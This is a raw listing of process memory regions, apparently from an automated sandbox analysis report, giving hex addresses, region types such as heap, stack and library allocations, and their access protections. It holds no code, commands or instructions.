page read and write
2B03B058000
heap
page read and write
1D910087000
trusted library allocation
page read and write
7FF848DE4000
trusted library allocation
page read and write
20145852000
trusted library allocation
page read and write
205CFCD8000
heap
page read and write
1784FF44000
trusted library allocation
page read and write
1C30A928000
trusted library allocation
page read and write
1C321B4F000
heap
page read and write
205B5BD0000
heap
page readonly
1D974C38000
heap
page read and write
CE11DFA000
stack
page read and write
1C3076D0000
heap
page read and write
2B03B64C000
heap
page read and write
2B03B0C4000
heap
page read and write
1785073E000
trusted library allocation
page read and write
72CA77E000
stack
page read and write
2015C555000
heap
page read and write
7FF8491E0000
trusted library allocation
page read and write
205B5BB0000
trusted library allocation
page read and write
2B022940000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
E066273000
stack
page read and write
20153F31000
trusted library allocation
page read and write
1C30AAB1000
trusted library allocation
page read and write
205C7900000
trusted library allocation
page read and write
201421FE000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
2B024436000
trusted library allocation
page read and write
1C309180000
heap
page read and write
1784FFED000
trusted library allocation
page read and write
2015C38C000
heap
page read and write
205C791C000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
19D9679000
stack
page read and write
1D90190A000
trusted library allocation
page read and write
1C30AC0B000
trusted library allocation
page read and write
2B03B065000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
1D975183000
heap
page read and write
1D901182000
trusted library allocation
page read and write
1C307930000
trusted library section
page read and write
7FF849000000
trusted library allocation
page read and write
7FF849200000
trusted library allocation
page read and write
1D974580000
heap
page execute and read and write
2B03B090000
heap
page read and write
20142218000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
2B032C3D000
trusted library allocation
page read and write
CE1213E000
stack
page read and write
7FF849190000
trusted library allocation
page read and write
205B7D08000
trusted library allocation
page read and write
197C70F000
stack
page read and write
7DF4E4E80000
trusted library allocation
page execute and read and write
1C3213A9000
heap
page read and write
1C30771C000
heap
page read and write
CE121BE000
stack
page read and write
1D974600000
heap
page read and write
2B0243AA000
trusted library allocation
page read and write
20145A60000
trusted library allocation
page read and write
205CFC42000
heap
page read and write
1D974DC3000
heap
page read and write
17850738000
trusted library allocation
page read and write
205B5BC5000
heap
page read and write
1D974A60000
heap
page read and write
2015C67D000
heap
page read and write
205B5BE0000
trusted library allocation
page read and write
2B03AF9A000
heap
page read and write
7FF849000000
trusted library allocation
page execute and read and write
1C321B9B000
heap
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
205B7914000
trusted library allocation
page read and write
20143F31000
trusted library allocation
page read and write
2015C40B000
heap
page read and write
7FF848FD4000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
7FF8492B0000
trusted library allocation
page read and write
7FF848DED000
trusted library allocation
page execute and read and write
7FF848FD7000
trusted library allocation
page read and write
2015C68E000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
1D974DB9000
heap
page read and write
7FF848E2B000
trusted library allocation
page read and write
2B023886000
trusted library allocation
page read and write
7FF849140000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
2B03AF4D000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
E066A7C000
stack
page read and write
1D974ADD000
heap
page read and write
CE11CFA000
stack
page read and write
20153FB4000
trusted library allocation
page read and write
19D8EA3000
stack
page read and write
7FF848FF2000
trusted library allocation
page read and write
CE11F3E000
stack
page read and write
7FF849260000
trusted library allocation
page read and write
CE1197E000
unkown
page read and write
2B03B447000
heap
page read and write
7FF848FCA000
trusted library allocation
page read and write
1D972A70000
trusted library allocation
page read and write
1785FF4B000
trusted library allocation
page read and write
1D90180C000
trusted library allocation
page read and write
197B978000
stack
page read and write
7FF848FF2000
trusted library allocation
page read and write
7FF849150000
trusted library allocation
page read and write
2B03ADE8000
heap
page read and write
2B03ADD9000
heap
page read and write
7DF42E380000
trusted library allocation
page execute and read and write
205B959A000
trusted library allocation
page read and write
20145787000
trusted library allocation
page read and write
7FF849150000
trusted library allocation
page read and write
6C72E4C000
stack
page read and write
7FF848E14000
trusted library allocation
page read and write
6C72F4A000
stack
page read and write
19D93FF000
stack
page read and write
2B022796000
heap
page read and write
205B7C73000
trusted library allocation
page read and write
7FF8492A0000
trusted library allocation
page read and write
2B03B6F6000
heap
page read and write
1C321B19000
heap
page read and write
205B5B90000
trusted library allocation
page read and write
E06754A000
stack
page read and write
1C321C3A000
heap
page read and write
7DF4097F0000
trusted library allocation
page execute and read and write
7FF848ECC000
trusted library allocation
page execute and read and write
19D8FEE000
stack
page read and write
2B03B0CF000
heap
page read and write
2B020EA0000
trusted library allocation
page read and write
7FF848DFB000
trusted library allocation
page read and write
1C321C75000
heap
page read and write
1D910089000
trusted library allocation
page read and write
1D90167C000
trusted library allocation
page read and write
1C30ACBF000
trusted library allocation
page read and write
7FF8490A0000
trusted library allocation
page read and write
There are 1193 hidden memdumps, click here to show them.